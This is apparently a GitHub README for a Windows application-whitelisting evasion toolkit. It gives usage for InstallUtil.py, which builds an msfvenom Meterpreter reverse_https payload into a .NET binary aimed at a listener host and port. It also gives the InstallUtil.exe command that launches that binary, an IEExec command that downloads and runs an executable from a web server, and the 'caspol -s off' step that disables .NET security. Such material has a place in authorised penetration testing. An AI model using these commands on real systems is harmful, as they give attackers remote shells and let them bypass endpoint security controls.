khr0x40sh/WhiteListEvasion: Collection of scripts, binaries and the like to aid in WhiteList Evasion on a Microsoft Windows Network.
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Collection of scripts, binaries and the like to aid in WhiteList Evasion on a Microsoft Windows Network.

  1. InstallUtil.py

    Usage: python InstallUtil.py [--cs_file cs_filename] [--exe_name exe_filename] [--payload payload] [--lhost lhost] [--lport lport]

    python InstallUtil.py --cs_file temp.cs --exe_name temp.exe --payload windows/meterpreter/reverse_https --lhost 192.168.1.11 --lport 443

    Script that generates a .NET binary that attempts to leverage the InstallUtil.exe whitelist evasion technique. this is accomplished by importing a msfvenom generated payload into the c_sharp template found here: http://www.room362.com/blog/2014/01/16/application-whitelist-bypass-using-ieexec-dot-exe/ . This template is then incorporated into the InstallUtil PoC found here: https://github.com/subTee/ShmooCon-2015/blob/master/CaseySmith-SimpleWindowsApplicationWhitelistingEvasion . One thing of note: The payload architecture must match the Framework subdir in the .NET path or the binary will crash.

Script.cs and script.exe are example output from InstallUtil.py. To execute the execute, simply get the binary on disk and then run (something much like): C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U script.exe

Requires mono, mono-develop, Python 2.7+, msfvenom (from metasploit). Tested and verified the script on a Kali linux VM. Both 32-bit and 64-bit binaries tested and verified on Windows 7 with .NET 4.5.

  1. Test64 (IEExec 64-bit test application)

    Host this binary on a webserver. To observe the binary without .NET Security, open up an administrative console, cd to C:\Windows\Microsoft.NET\Framework\v2.05727\ and then run 'caspol -s off'. In an another window (can be non administrative), cd to the same .NET directory and execute IEExec . An example would look like this: C:\Windows\Microsoft.NET\Framework\v2.05727> IEExec http://testserver.org/files/test64.exe

    To observe with .NET Security enabled, just simply run the above without ever disabling caspol. You should be able to pull down strings from a file hosted by a webserver, but unable to execute,read, or write anything on the host system.

    To build the binary, ensure you have the x64 profile set in Visual Studio 2013.

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